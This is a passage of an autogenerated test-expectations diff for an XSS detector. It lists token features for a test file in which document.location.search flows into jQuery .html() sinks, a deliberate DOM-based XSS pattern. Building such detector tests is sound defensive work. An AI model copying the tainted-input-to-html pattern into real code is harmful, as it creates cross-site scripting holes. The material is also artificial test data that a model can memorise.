URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | exceptional return of random() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | exceptional return of random() | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | exceptional return of random() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | exceptional return of random() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | random() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | random() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | random() | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | random() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:401:7:401:14 | random() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | $('myId ... taint6) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | $('myId ... taint6) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | $('myId ... taint6) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | $('myId ... taint6) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | $('myId ... taint6) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | exceptional return of $('myId ... taint6) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | exceptional return of $('myId ... taint6) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | exceptional return of $('myId ... taint6) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | exceptional return of $('myId ... taint6) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:3:402:31 | exceptional return of $('myId ... taint6) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:402:5:402:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:402:5:402:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:402:5:402:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17471,6 +121515,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:402:5:402:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:402:5:402:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:402:5:402:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:13:402:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:13:402:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:13:402:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:13:402:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:13:402:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:18:402:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:18:402:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:18:402:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:18:402:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:18:402:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:402:18:402:30 | target.taint6 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:402:18:402:30 | target.taint6 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:402:18:402:30 | target.taint6 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17478,6 +121532,82 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:402:18:402:30 | target.taint6 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:402:18:402:30 | target.taint6 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:402:18:402:30 | target.taint6 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:402:25:402:30 | taint6 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:402:25:402:30 | taint6 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:402:25:402:30 | taint6 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:402:25:402:30 | taint6 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:402:25:402:30 | taint6 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:12 | random | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:12 | random | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:12 | random | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:12 | random | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:12 | random | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | exceptional return of random() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | exceptional return of random() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | exceptional return of random() | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | exceptional return of random() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | exceptional return of random() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | random() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | random() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | random() | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | random() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:7:405:14 | random() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:30 | target.taint7 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:30 | target.taint7 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:30 | target.taint7 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:30 | target.taint7 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:30 | target.taint7 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:39 | target. ... "safe" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:39 | target. ... "safe" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:39 | target. ... "safe" | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:405:18:405:39 | target. ... "safe" | enclosingFunctionName | test | +| 